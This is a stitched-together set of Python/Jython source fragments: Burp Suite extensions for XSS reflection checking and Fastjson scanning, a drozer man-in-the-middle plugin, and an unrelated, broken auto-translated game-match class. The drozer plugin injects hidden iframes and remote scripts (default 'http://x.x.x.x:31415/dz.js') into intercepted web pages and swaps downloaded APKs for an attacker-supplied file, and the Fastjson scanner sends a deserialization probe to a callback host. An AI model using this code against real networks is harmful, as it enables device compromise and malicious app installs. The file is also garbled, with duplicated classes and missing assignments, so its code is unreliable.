str2 = self.definesContext(payload, response)
self.issues(bRequestResponse, str2 + " " + str1, word, waf)
if payload == 'dumm</script>ss':
str1 = word + " Script tags allowed"
str2 = self.definesContext(payload, response)
self.issues(bRequestResponse, str2 + " " + str1, word, waf)
if payload == '<h1>duteer</h1>ss':
str1 = word + " HTML tags allowed"
str2 = self.definesContext(payload, response)
self.issues(bRequestResponse, str2 + " " + str1, word, waf)
else:
pass
if status == 403:
self.issues(bRequestResponse, "", word, "Blocked")
def definesContext(self, reflection, html):
indx = html.find(reflection)
q = html[indx - 1]
q2 = html[indx + len(reflection)]
if q in reflection and q == '"':
return "[Vulnerable][attribute][\"]"
if q in reflection and q == "'":
return "[Vulnerable][attribute][']"
else:
return "[Possible]"
class BurpExtender(IBurpExtender, ITab, IScannerCheck,
IMessageEditorController, AbstractTableModel):
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
# keep a reference to our callbacks object
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("fastjson scanner")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
# main split pane
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
# table of log entries
logTable = Table(self)
scrollPane = JScrollPane(logTable)
self._splitpane.setLeftComponent(scrollPane)
# tabs with request/response viewers
tabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
tabs.addTab("Request", self._requestViewer.getComponent())
tabs.addTab("Response", self._responseViewer.getComponent())
self._splitpane.setRightComponent(tabs)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(tabs)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourselves as an HTTP listener
callbacks.registerScannerCheck(self)
# id for column
self.id = 0
# print("Suucess Load.")
return
def getTabCaption(self):
return "FastjsonScanner"
def getUiComponent(self):
return self._splitpane
def doActiveScan(self, baseRequestResponse, insertionPoint):
pass
def doPassiveScan(self, baseRequestResponse):
self.baseRequestResponse = baseRequestResponse
# service = baseRequestResponse.getHttpService()
result = self.scancheck(baseRequestResponse)
if result != [] and result != '' and result != None:
param, url = result
self.id += 1
#analyze_request = self._helpers.analyzeRequest(service,baseRequestResponse.getRequest())
self._lock.acquire()
row = self._log.size()
self._log.add(LogEntry(self.id, baseRequestResponse, param, url))
self.fireTableRowsInserted(row, row)
self._lock.release()
return
def scancheck(self, baseRequestResponse):
collaboratorContext = self._callbacks.createBurpCollaboratorClientContext(
)
val = collaboratorContext.generatePayload(True)
#print(val)
fastjson_poc = '{{"@type":"java.net.URL","val":"http://%s"}:"x"}' % val
# print(fastjson_poc)
host, port, protocol, method, headers, params, url, reqBodys, analyze_request = self.Get_RequestInfo(
baseRequestResponse)
if method == "GET":
is_json = False
str_params = str(params)
split_params = str_params.split('&')
replace_params = ''
json_list = []
for param in split_params:
if '=' in param and len(param.split('=')) == 2:
key, value = param.split('=')
urldecode_value = self._helpers.urlDecode(value)
try:
if json.loads(
urldecode_value) and '{' in urldecode_value:
value = fastjson_poc
is_json = True
json_list.append(key)
except Exception as e:
# print(e)
pass
try:
replace_params += key + '=' + value + '&'
except:
pass
replace_params = replace_params[:-1]
# print(replace_params)
# print(str_params)
if is_json == True:
againReq_headers = headers
againReq_headers[0] = headers[0].replace(
params, replace_params)
againReq = self._helpers.buildHttpMessage(
againReq_headers, reqBodys)
if protocol == 'https':
is_https = True
else:
is_https = False
againRes = self._callbacks.makeHttpRequest(
host, port, is_https, againReq)
analyze_againRes = self._helpers.analyzeResponse(againRes)
time.sleep(10) # check time for delay
if collaboratorContext.fetchCollaboratorInteractionsFor(val):
print('success send in get.')
return ','.join(json_list), str(url)
# print(1)
# while True:
# # print(1)
# print(collaboratorContext.fetchCollaboratorInteractionsFor(val))
# if collaboratorContext.fetchCollaboratorInteractionsFor(val):
# print('success')
elif method == "POST":
json_list = []
try: # check reqbody like {"xxx":"xxx"}
if json.loads(reqBodys) and '{' in reqBodys:
body_json = True
replace_reqBodys = fastjson_poc
except:
#replace_reqBodys = reqBodys
body_json = False
if body_json == True:
againReq = self._helpers.buildHttpMessage(
headers, replace_reqBodys)
if protocol == 'https':
is_https = True
else:
is_https = False
againRes = self._callbacks.makeHttpRequest(
host, port, is_https, againReq)
analyze_againRes = self._helpers.analyzeResponse(againRes)
# print(replace_reqBodys)
print('success')
time.sleep(10)
if collaboratorContext.fetchCollaboratorInteractionsFor(val):
#print('success')
return 'postdata', str(url)
else:
print('no fetch result.')
# else:
# print(replace_reqBodys)
# print('fail')
else: # check reqbody like a=1&b=json_str
replace_params = ''
is_json_post = False
split_body_param = reqBodys.split('&')
for body_param in split_body_param:
# print(body_param)
# print(reqBodys)
if '=' in body_param and len(body_param.split('=')) == 2:
post_key, post_value = body_param.split('=')
urldecode_value = self._helpers.urlDecode(post_value)
try:
if json.loads(urldecode_value
) and '{' in urldecode_value:
post_value = fastjson_poc
is_json_post = True
json_list.append(post_key)
except Exception as e:
# print(e)
pass
try:
replace_params += post_key + '=' + post_value + '&'
except Exception as e:
# print(3)
# print(e)
pass
replace_params = replace_params[:-1]
# print(replace_params)
if is_json_post == True:
print('success send in post get')
againReq = self._helpers.buildHttpMessage(
headers, replace_params)
if protocol == 'https':
is_https = True
else:
is_https = False
# print(replace_params)
againRes = self._callbacks.makeHttpRequest(
host, port, is_https, againReq)
analyze_againRes = self._helpers.analyzeResponse(againRes)
time.sleep(10)
if collaboratorContext.fetchCollaboratorInteractionsFor(
val):
# print('success')
return ','.join(json_list), str(url)
# else:
# print('fail')
# print(123123)
# print(123)
# str_params = str(params)
# split_params = str_params.split('&')
# replace_params = ''
# json_list = []
# for param in split_params:
# if '=' in param and len(param.split('=')) == 2:
# key, value = param.split('=')
# urldecode_value = self._helpers.urlDecode(value)
# try:
# if json.loads(urldecode_value) and '{' in urldecode_value:
# value = fastjson_poc
# is_json = True
# json_list.append(key)
# except Exception as e:
# # print(e)
# pass
# try:
# replace_params += key + '=' + value + '&'
# except:
# pass
# replace_params = replace_params[:-1]
# print(replace_params)
# print('ok')
# if is_json == True:
# print('post json find')
# print(replace_params)
# againReq_headers = headers
# againReq_headers[0] = headers[0].replace(params, replace_params)
# againReq = self._helpers.buildHttpMessage(againReq_headers, reqBodys)
# if protocol == 'https':
# is_https = True
# else:
# is_https = False
# againRes = self._callbacks.makeHttpRequest(host, port, is_https, againReq)
# analyze_againRes = self._helpers.analyzeResponse(againRes)
# time.sleep(5) # check time for delay
# if collaboratorContext.fetchCollaboratorInteractionsFor(val):
# # print('success')
# return ','.join(json_list), str(url)
# print('success')
# print(replace_params)
# else:
# print(replace_params)
return []
#pass
def Get_RequestInfo(self, baseRequestResponse):
"""
extract about service
"""
service = baseRequestResponse.getHttpService()
host = service.getHost()
port = service.getPort()
protocol = service.getProtocol()
"""
extract request
"""
analyze_request = self._helpers.analyzeRequest(
service, baseRequestResponse.getRequest())
reqBodys = baseRequestResponse.getRequest(
)[analyze_request.getBodyOffset():].tostring()
url = analyze_request.getUrl()
headers = analyze_request.getHeaders()
method = analyze_request.getMethod()
params = [
i for i in analyze_request.getParameters()
if i.getType() == IParameter.PARAM_URL
]
extract_params = '&'.join([('%s=%s' % (c.getName(), c.getValue()))
for c in params])
return host, port, protocol, method, headers, extract_params, url, reqBodys, analyze_request
def Get_ResponseInfo(self, baseRequestResponse):
"""
extract response
"""
analyze_response = self._helpers.analyzeResponse(
baseRequestResponse.getResponse())
status_code = analyze_response.getStatusCode()
body = baseRequestResponse.getResponse()[analyze_response.
getBodyOffset():].tostring()
return status_code, body
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 3
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "ID"
if columnIndex == 1:
return "PARAM"
if columnIndex == 2:
return "URL"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return logEntry._id
if columnIndex == 1:
return logEntry._param
if columnIndex == 2:
return logEntry._url
return ""
#
# implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
class BurpExtender(IBurpExtender, ITab, IHttpListener, IMessageEditorController, AbstractTableModel):
#
# Evil global variables
# Be ready to receive hate mail Tyrone & Daniel!
#
apkRequests = {}
#
# Executors
#
def injectPwn(self, messageInfo):
# Get response
response = messageInfo.getResponse()
responseParsed = self._helpers.analyzeResponse(response)
body = self._callbacks.getHelpers().bytesToString(response)[responseParsed.getBodyOffset():]
headers = responseParsed.getHeaders()
if not self.tools[2].getTickBoxTicked():
# Method 1 - silent invocation - Inject iframe loading from pwn:// into responses (case insensitive)
changedContent = re.sub(re.compile(r'</body>', re.IGNORECASE), '<iframe src="pwn://lol" width=1 height=1 style="visibility:hidden;position:absolute"></iframe></body>', body)
else:
# Method 2 - active invocation - redirect to the pwn:// handler (this is a requirement for versions of Chromium >= 25)
changedContent = re.sub(re.compile(r'</body>', re.IGNORECASE), '<script>window.location="pwn://www.google.com/pluginerror.html"</script></body>', body)
changedContentBytes = self._callbacks.getHelpers().stringToBytes(changedContent)
final = self._callbacks.getHelpers().buildHttpMessage(headers, changedContentBytes);
# Set the response if the content changed and add to log
if body != changedContent:
messageInfo.setResponse(final)
self.addLog(self._helpers.analyzeRequest(messageInfo).getUrl(), "Injected drozer invocation with pwn://")
return
def injectJs(self, messageInfo):
# Get response
response = messageInfo.getResponse()
responseParsed = self._helpers.analyzeResponse(response)
body = self._callbacks.getHelpers().bytesToString(response)[responseParsed.getBodyOffset():]
headers = responseParsed.getHeaders()
editBoxStr = str(self.tools[0].getEditBox())
# Inject arbitrary script into responses
changedContent = re.sub(re.compile(r'<head>', re.IGNORECASE), '<head><script src="' + editBoxStr + '"></script>', body)
changedContent = re.sub(re.compile(r'</body>', re.IGNORECASE), '<script src="' + editBoxStr + '"></script></body>', changedContent)
changedContent = re.sub(re.compile(r'<content>', re.IGNORECASE), '<content><script src="' + editBoxStr + '"></script>', changedContent)
changedContentBytes = self._callbacks.getHelpers().stringToBytes(changedContent)
final = self._callbacks.getHelpers().buildHttpMessage(headers, changedContentBytes);
# Set the response if the content changed and add to log
if body != changedContent:
messageInfo.setResponse(final)
self.addLog(self._helpers.analyzeRequest(messageInfo).getUrl(), "Injected JavaScript from " + editBoxStr)
return
def modifyAPKRequest(self, messageInfo):
# Get requested path
req = self._callbacks.getHelpers().analyzeRequest(messageInfo)
reqUrl = req.getUrl()
headers = list(req.getHeaders()) # convert to python list
reqHost = reqUrl.getHost()
reqPath = reqUrl.getPath()
reqPort = reqUrl.getPort()
# If it ends in .apk then change type to HEAD
if reqPath.upper().endswith(".APK"):
self.addLog(reqUrl, "Got request for APK...")
# Determine whether an HTTP or HTTPS connection must be made
if reqPort == 443:
conn = httplib.HTTPSConnection(reqHost, reqPort)
else:
conn = httplib.HTTPConnection(reqHost, reqPort)
# Get headers from user request
httpLibHeaders = {}
for i in headers:
splitHeaders = i.split(": ")
if len(splitHeaders) == 2:
httpLibHeaders[splitHeaders[0]] = splitHeaders[1]
# Perform HEAD on target file from server using headers
conn.request("HEAD", reqPath, headers=httpLibHeaders)
response = conn.getresponse()
responseHeaders = response.getheaders()
# Add to information for use by injectAPK()
version = ""
if str(response.version) == "11":
version = "HTTP/1.1"
else:
version = "HTTP/1.0"
self.apkRequests[reqPath] = [reqUrl, version + " " + str(response.status) + " " + str(response.reason), responseHeaders]
print self.apkRequests[reqPath]
# Instead of passing request - change host to www.google.com which will be non existent
httpService = messageInfo.getHttpService()
messageInfo.setHttpService(self._callbacks.getHelpers().buildHttpService("www.google.com", httpService.getPort(), httpService.getProtocol()))
return
def injectAPK(self, messageInfo):
# Get requested path
req = self._callbacks.getHelpers().analyzeRequest(messageInfo)
reqUrl = req.getUrl()
reqHost = reqUrl.getHost()
reqPath = reqUrl.getPath()
reqPort = reqUrl.getPort()
# If it ends in .apk then replace it!
if reqPath.upper().endswith(".APK"):
# Check this is a request we have seen
if reqPath in self.apkRequests:
# Get stored url and header
res = self.apkRequests[reqPath]
url = res[0]
httpStatus = res[1]
headers = []
headers.append(httpStatus)
for i in res[2]:
headers.append(i[0] + ': ' + ''.join(i[1:]))
# Open and read APK from specified path
f = open(self.tools[1].getEditBox())
changedContentBytes = f.read()
f.close()
final = self._callbacks.getHelpers().buildHttpMessage(headers, changedContentBytes);
# Replace response with new APK
messageInfo.setResponse(final)
self.addLog(url, "Replaced APK!")
return
def injectCustomURI(self, messageInfo):
# Get response
response = messageInfo.getResponse()
responseParsed = self._helpers.analyzeResponse(response)
body = self._callbacks.getHelpers().bytesToString(response)[responseParsed.getBodyOffset():]
headers = responseParsed.getHeaders()
uri = self.tools[3].getEditBox()
if not self.tools[3].getTickBoxTicked():
# Method 1 - silent invocation - Inject iframe loading from pwn:// into responses (case insensitive)
changedContent = re.sub(re.compile(r'</body>', re.IGNORECASE), '<iframe src="' + uri + '" width=1 height=1 style="visibility:hidden;position:absolute"></iframe></body>', body)
else:
# Method 2 - active invocation - redirect to the pwn:// handler (this is a requirement for versions of Chromium >= 25)
changedContent = re.sub(re.compile(r'</body>', re.IGNORECASE), '<script>window.location="' + uri + '"</script></body>', body)
changedContentBytes = self._callbacks.getHelpers().stringToBytes(changedContent)
final = self._callbacks.getHelpers().buildHttpMessage(headers, changedContentBytes);
# Set the response if the content changed and add to log
if body != changedContent:
messageInfo.setResponse(final)
self.addLog(self._helpers.analyzeRequest(messageInfo).getUrl(), "Injected custom URI")
return
def nothing(self, messageInfo):
pass
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
# Make available to whole class
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("MitM helper plugin for drozer")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
# Split pane
self._splitpane = swing.JSplitPane(swing.JSplitPane.HORIZONTAL_SPLIT)
# Create Tab
topPanel = swing.JPanel()
topPanel.setLayout(swing.BoxLayout(topPanel, swing.BoxLayout.Y_AXIS))
# Define all tools
self.tools = []
self.tools.append(Tool(180, "JavaScript Injection", "Inject Remote JS into HTTP Responses", self.nothing, self.injectJs, "JS Location", "http://x.x.x.x:31415/dz.js"))
self.tools.append(Tool(180, "APK Replacement", "Replace APK with specified one when requested", self.modifyAPKRequest, self.injectAPK, "APK Location", "", True))
self.tools.append(Tool(170, "Invoke drozer using pwn://", "Inject code into HTTP Responses that invokes installed drozer agent", self.nothing, self.injectPwn, None, None, None, "Perform active invocation (required for Chromium >= 25)"))
self.tools.append(Tool(220, "Custom URI Handler Injection", "Inject code into HTTP Responses that invokes specified URI handler", self.nothing, self.injectCustomURI, "URI", "pwn://me", None, "Perform active invocation (required for Chromium >= 25)"))
# Add all tools to panel
for i in self.tools:
topPanel.add(i.getPanel())
self._splitpane.setLeftComponent(topPanel)
# table of log entries
logTable = Table(self)
logTable.setAutoResizeMode( swing.JTable.AUTO_RESIZE_ALL_COLUMNS );
logTable.getColumn("Time").setPreferredWidth(120)
logTable.getColumn("URL").setPreferredWidth(500)
scrollPane = swing.JScrollPane(logTable)
self._splitpane.setRightComponent(scrollPane)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(topPanel)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
return
def addLog(self, url, action):
self._lock.acquire()
row = self._log.size()
self._log.add(LogEntry(strftime("%Y-%m-%d %H:%M:%S", gmtime()), url, action))
self.fireTableRowsInserted(row, row)
self._lock.release()
#
# implement ITab
#
def getTabCaption(self):
return "drozer"
def getUiComponent(self):
return self._splitpane
#
# implement IHttpListener
#
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
# Execute all enabled tools
for i in self.tools:
if i.getButtonEnabled():
if messageIsRequest:
i.getRequestExecutor()(messageInfo)
else:
i.getResponseExecutor()(messageInfo)
#
# extend AbstractTableModel
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 3
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "Time"
if columnIndex == 1:
return "URL"
if columnIndex == 2:
return "Action"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return logEntry._time
if columnIndex == 1:
return logEntry._url
if columnIndex == 2:
return logEntry._action
return ""
class Match(object):
""" generated source for class Match """
matchId = str()
randomToken = str()
spectatorAuthToken = str()
playClock = int()
startClock = int()
previewClock = int()
startTime = Date()
theGame = Game()
moveHistory = List()
stateHistory = List()
errorHistory = List()
stateTimeHistory = List()
isCompleted = bool()
isAborted = bool()
goalValues = List()
numRoles = int()
theCryptographicKeys = EncodedKeyPair()
thePlayerNamesFromHost = List()
isPlayerHuman = List()
theGdlScrambler = NoOpGdlScrambler()
@overloaded
def __init__(self, matchId, previewClock, startClock, playClock, theGame):
""" generated source for method __init__ """
self.matchId = matchId
self.previewClock = previewClock
self.startClock = startClock
self.playClock = playClock
self.theGame = theGame
self.startTime = Date()
self.randomToken = getRandomString(32)
self.spectatorAuthToken = getRandomString(12)
self.isCompleted = False
self.isAborted = False
self.numRoles = Role.computeRoles(theGame.getRules()).size()
self.moveHistory = ArrayList()
self.stateHistory = ArrayList()
self.stateTimeHistory = ArrayList()
self.errorHistory = ArrayList()
self.goalValues = ArrayList()
@__init__.register(object, str, Game, str)
def __init___0(self, theJSON, theGame, authToken):
""" generated source for method __init___0 """
theMatchObject = JSONObject(theJSON)
self.matchId = theMatchObject.getString("matchId")
self.startClock = theMatchObject.getInt("startClock")
self.playClock = theMatchObject.getInt("playClock")
if theGame == None:
self.theGame = RemoteGameRepository.loadSingleGame(theMatchObject.getString("gameMetaURL"))
if self.theGame == None:
raise RuntimeException("Could not find metadata for game referenced in Match object: " + theMatchObject.getString("gameMetaURL"))
else:
self.theGame = theGame
if theMatchObject.has("previewClock"):
self.previewClock = theMatchObject.getInt("previewClock")
else:
self.previewClock = -1
self.startTime = Date(theMatchObject.getLong("startTime"))
self.randomToken = theMatchObject.getString("randomToken")
self.spectatorAuthToken = authToken
self.isCompleted = theMatchObject.getBoolean("isCompleted")
if theMatchObject.has("isAborted"):
self.isAborted = theMatchObject.getBoolean("isAborted")
else:
self.isAborted = False
self.numRoles = Role.computeRoles(self.theGame.getRules()).size()
self.moveHistory = ArrayList()
self.stateHistory = ArrayList()
self.stateTimeHistory = ArrayList()
self.errorHistory = ArrayList()
theMoves = theMatchObject.getJSONArray("moves")
i = 0
while i < len(theMoves):
while j < len(moveElements):
theMove.add(GdlFactory.createTerm(moveElements.getString(j)))
j += 1
self.moveHistory.add(theMove)
i += 1
theStates = theMatchObject.getJSONArray("states")
i = 0
while i < len(theStates):
while j < len(stateElements):
theState.add(GdlFactory.create("( true " + stateElements.get(j).__str__() + " )"))
j += 1
self.stateHistory.add(theState)
i += 1
theStateTimes = theMatchObject.getJSONArray("stateTimes")
i = 0
while i < len(theStateTimes):
self.stateTimeHistory.add(Date(theStateTimes.getLong(i)))
i += 1
if theMatchObject.has("errors"):
while i < len(theErrors):
while j < len(errorElements):
theMoveErrors.add(errorElements.getString(j))
j += 1
self.errorHistory.add(theMoveErrors)
i += 1
self.goalValues = ArrayList()
try:
while i < len(theGoalValues):
self.goalValues.add(theGoalValues.getInt(i))
i += 1
except JSONException as e:
pass
# TODO: Add a way to recover cryptographic public keys and signatures.
# Or, perhaps loading a match into memory for editing should strip those?
if theMatchObject.has("playerNamesFromHost"):
self.thePlayerNamesFromHost = ArrayList()
while i < len(thePlayerNames):
self.thePlayerNamesFromHost.add(thePlayerNames.getString(i))
i += 1
if theMatchObject.has("isPlayerHuman"):
self.isPlayerHuman = ArrayList()
while i < len(isPlayerHumanArray):
self.isPlayerHuman.add(isPlayerHumanArray.getBoolean(i))
i += 1
# Mutators
def setCryptographicKeys(self, k):
""" generated source for method setCryptographicKeys """
self.theCryptographicKeys = k
def enableScrambling(self):
""" generated source for method enableScrambling """
self.theGdlScrambler = MappingGdlScrambler(Random(self.startTime.getTime()))
for rule in theGame.getRules():
self.theGdlScrambler.scramble(rule)
def setPlayerNamesFromHost(self, thePlayerNames):
""" generated source for method setPlayerNamesFromHost """
self.thePlayerNamesFromHost = thePlayerNames
def getPlayerNamesFromHost(self):
""" generated source for method getPlayerNamesFromHost """
return self.thePlayerNamesFromHost
def setWhichPlayersAreHuman(self, isPlayerHuman):
""" generated source for method setWhichPlayersAreHuman """
self.isPlayerHuman = isPlayerHuman
def appendMoves(self, moves):
""" generated source for method appendMoves """
self.moveHistory.add(moves)
def appendMoves2(self, moves):
""" generated source for method appendMoves2 """
# NOTE: This is appendMoves2 because it Java can't handle two
# appendMove methods that both take List objects with different
# templatized parameters.
theMoves = ArrayList()
for m in moves:
theMoves.add(m.getContents())
self.appendMoves(theMoves)
def appendState(self, state):
""" generated source for method appendState """
self.stateHistory.add(state)
self.stateTimeHistory.add(Date())
def appendErrors(self, errors):
""" generated source for method appendErrors """
self.errorHistory.add(errors)
def appendNoErrors(self):
""" generated source for method appendNoErrors """
theNoErrors = ArrayList()
i = 0
while i < self.numRoles:
theNoErrors.add("")
i += 1
self.errorHistory.add(theNoErrors)
def markCompleted(self, theGoalValues):
""" generated source for method markCompleted """
self.isCompleted = True
if theGoalValues != None:
self.goalValues.addAll(theGoalValues)
def markAborted(self):
""" generated source for method markAborted """
self.isAborted = True
# Complex accessors
def toJSON(self):
""" generated source for method toJSON """
theJSON = JSONObject()
try:
theJSON.put("matchId", self.matchId)
theJSON.put("randomToken", self.randomToken)
theJSON.put("startTime", self.startTime.getTime())
theJSON.put("gameMetaURL", getGameRepositoryURL())
theJSON.put("isCompleted", self.isCompleted)
theJSON.put("isAborted", self.isAborted)
theJSON.put("states", JSONArray(renderArrayAsJSON(renderStateHistory(self.stateHistory), True)))
theJSON.put("moves", JSONArray(renderArrayAsJSON(renderMoveHistory(self.moveHistory), False)))
theJSON.put("stateTimes", JSONArray(renderArrayAsJSON(self.stateTimeHistory, False)))
if len(self.errorHistory) > 0:
theJSON.put("errors", JSONArray(renderArrayAsJSON(renderErrorHistory(self.errorHistory), False)))
if len(self.goalValues) > 0:
theJSON.put("goalValues", self.goalValues)
theJSON.put("previewClock", self.previewClock)
theJSON.put("startClock", self.startClock)
theJSON.put("playClock", self.playClock)
if self.thePlayerNamesFromHost != None:
theJSON.put("playerNamesFromHost", self.thePlayerNamesFromHost)
if self.isPlayerHuman != None:
theJSON.put("isPlayerHuman", self.isPlayerHuman)
theJSON.put("scrambled", self.theGdlScrambler.scrambles() if self.theGdlScrambler != None else False)
except JSONException as e:
return None
if self.theCryptographicKeys != None:
try:
SignableJSON.signJSON(theJSON, self.theCryptographicKeys.thePublicKey, self.theCryptographicKeys.thePrivateKey)
if not SignableJSON.isSignedJSON(theJSON):
raise Exception("Could not recognize signed match: " + theJSON)
if not SignableJSON.verifySignedJSON(theJSON):
raise Exception("Could not verify signed match: " + theJSON)
except Exception as e:
System.err.println(e)
theJSON.remove("matchHostPK")
theJSON.remove("matchHostSignature")
return theJSON.__str__()
def toXML(self):
""" generated source for method toXML """
try:
theXML.append("<match>")
for key in JSONObject.getNames(theJSON):
if isinstance(value, (JSONObject, )):
raise RuntimeException("Unexpected embedded JSONObject in match JSON with tag " + key + "; could not convert to XML.")
elif not (isinstance(value, (JSONArray, ))):
theXML.append(renderLeafXML(key, theJSON.get(key)))
elif key == "states":
theXML.append(renderStateHistoryXML(self.stateHistory))
elif key == "moves":
theXML.append(renderMoveHistoryXML(self.moveHistory))
elif key == "errors":
theXML.append(renderErrorHistoryXML(self.errorHistory))
else:
theXML.append(renderArrayXML(key, value))
theXML.append("</match>")
return theXML.__str__()
except JSONException as je:
return None
def getMostRecentMoves(self):
""" generated source for method getMostRecentMoves """
if len(self.moveHistory) == 0:
return None
return self.moveHistory.get(len(self.moveHistory) - 1)
def getMostRecentState(self):
""" generated source for method getMostRecentState """
if len(self.stateHistory) == 0:
return None
return self.stateHistory.get(len(self.stateHistory) - 1)
def getGameRepositoryURL(self):
""" generated source for method getGameRepositoryURL """
return getGame().getRepositoryURL()
def __str__(self):
""" generated source for method toString """
return self.toJSON()
# Simple accessors
def getMatchId(self):
""" generated source for method getMatchId """
return self.matchId
def getRandomToken(self):
""" generated source for method getRandomToken """
return self.randomToken
def getSpectatorAuthToken(self):
""" generated source for method getSpectatorAuthToken """
return self.spectatorAuthToken
def getGame(self):
""" generated source for method getGame """
return self.theGame
def getMoveHistory(self):
""" generated source for method getMoveHistory """
return self.moveHistory
def getStateHistory(self):
""" generated source for method getStateHistory """
return self.stateHistory
def getStateTimeHistory(self):
""" generated source for method getStateTimeHistory """
return self.stateTimeHistory
def getErrorHistory(self):
""" generated source for method getErrorHistory """
return self.errorHistory
def getPreviewClock(self):
""" generated source for method getPreviewClock """
return self.previewClock
def getPlayClock(self):
""" generated source for method getPlayClock """
return self.playClock
def getStartClock(self):
""" generated source for method getStartClock """
return self.startClock
def getStartTime(self):
""" generated source for method getStartTime """
return self.startTime
def isCompleted(self):
""" generated source for method isCompleted """
return self.isCompleted
def isAborted(self):
""" generated source for method isAborted """
return self.isAborted
def getGoalValues(self):
""" generated source for method getGoalValues """
return self.goalValues
def getGdlScrambler(self):
""" generated source for method getGdlScrambler """
return self.theGdlScrambler
# Static methods
@classmethod
def getRandomString(cls, nLength):
""" generated source for method getRandomString """
theGenerator = Random()
theString = ""
i = 0
while i < nLength:
if nVal < 26:
theString += str(('a' + nVal))
elif nVal < 52:
theString += str(('A' + (nVal - 26)))
elif nVal < 62:
theString += str(('0' + (nVal - 52)))
i += 1
return theString
# JSON rendering methods
@classmethod
def renderArrayAsJSON(cls, theList, useQuotes):
""" generated source for method renderArrayAsJSON """
s = "["
i = 0
while i < len(theList):
# AppEngine-specific, not needed yet: if (o instanceof Text) o = ((Text)o).getValue();
if isinstance(o, (Date, )):
o = (o).getTime()
if useQuotes:
s += "\""
s += o.__str__()
if useQuotes:
s += "\""
if i < len(theList) - 1:
s += ", "
i += 1
return s + "]"
@classmethod
def renderStateHistory(cls, stateHistory):
""" generated source for method renderStateHistory """
renderedStates = ArrayList()
for aState in stateHistory:
renderedStates.add(renderStateAsSymbolList(aState))
return renderedStates
@classmethod
def renderMoveHistory(cls, moveHistory):
""" generated source for method renderMoveHistory """
renderedMoves = ArrayList()
for aMove in moveHistory:
renderedMoves.add(cls.renderArrayAsJSON(aMove, True))
return renderedMoves
@classmethod
def renderErrorHistory(cls, errorHistory):
""" generated source for method renderErrorHistory """
renderedErrors = ArrayList()
for anError in errorHistory:
renderedErrors.add(cls.renderArrayAsJSON(anError, True))
return renderedErrors
@classmethod
def renderStateAsSymbolList(cls, theState):
""" generated source for method renderStateAsSymbolList """
# Strip out the TRUE proposition, since those are implied for states.
s = "( "
for sent in theState:
s += sentString.substring(6, 2 - len(sentString)).trim() + " "
return s + ")"
# XML Rendering methods -- these are horribly inefficient and are included only for legacy/standards compatibility
@classmethod
def renderLeafXML(cls, tagName, value):
""" generated source for method renderLeafXML """
return "<" + tagName + ">" + value.__str__() + "</" + tagName + ">"
@classmethod
def renderMoveHistoryXML(cls, moveHistory):
""" generated source for method renderMoveHistoryXML """
theXML = StringBuilder()
theXML.append("<history>")
for move in moveHistory:
theXML.append("<move>")
for action in move:
theXML.append(cls.renderLeafXML("action", renderGdlToXML(action)))
theXML.append("</move>")
theXML.append("</history>")
return theXML.__str__()
@classmethod
def renderErrorHistoryXML(cls, errorHistory):
""" generated source for method renderErrorHistoryXML """
theXML = StringBuilder()
theXML.append("<errorHistory>")
for errors in errorHistory:
theXML.append("<errors>")
for error in errors:
theXML.append(cls.renderLeafXML("error", error))
theXML.append("</errors>")
theXML.append("</errorHistory>")
return theXML.__str__()
@classmethod
def renderStateHistoryXML(cls, stateHistory):
""" generated source for method renderStateHistoryXML """
theXML = StringBuilder()
theXML.append("<herstory>")
for state in stateHistory:
theXML.append(renderStateXML(state))
theXML.append("</herstory>")
return theXML.__str__()
@classmethod
def renderStateXML(cls, state):
""" generated source for method renderStateXML """
theXML = StringBuilder()
theXML.append("<state>")
for sentence in state:
theXML.append(renderGdlToXML(sentence))
theXML.append("</state>")
return theXML.__str__()
@classmethod
def renderArrayXML(cls, tag, arr):
""" generated source for method renderArrayXML """
theXML = StringBuilder()
i = 0
while i < len(arr):
theXML.append(cls.renderLeafXML(tag, arr.get(i)))
i += 1
return theXML.__str__()
@classmethod
def renderGdlToXML(cls, gdl):
""" generated source for method renderGdlToXML """
rval = ""
if isinstance(gdl, (GdlConstant, )):
return c.getValue()
elif isinstance(gdl, (GdlFunction, )):
if f.__name__.__str__() == "true":
return "<fact>" + cls.renderGdlToXML(f.get(0)) + "</fact>"
else:
rval += "<relation>" + f.__name__ + "</relation>"
while i < f.arity():
pass
i += 1
return rval
elif isinstance(gdl, (GdlRelation, )):
if relation.__name__.__str__() == "true":
while i < relation.arity():
pass
i += 1
return rval
else:
rval += "<relation>" + relation.__name__ + "</relation>"
while i < relation.arity():
pass
i += 1
return rval
else:
System.err.println("gdlToXML Error: could not handle " + gdl.__str__())
return None
class BurpExtender(IBurpExtender, IContextMenuFactory, ITab, IHttpListener, IMessageEditorController, AbstractTableModel):
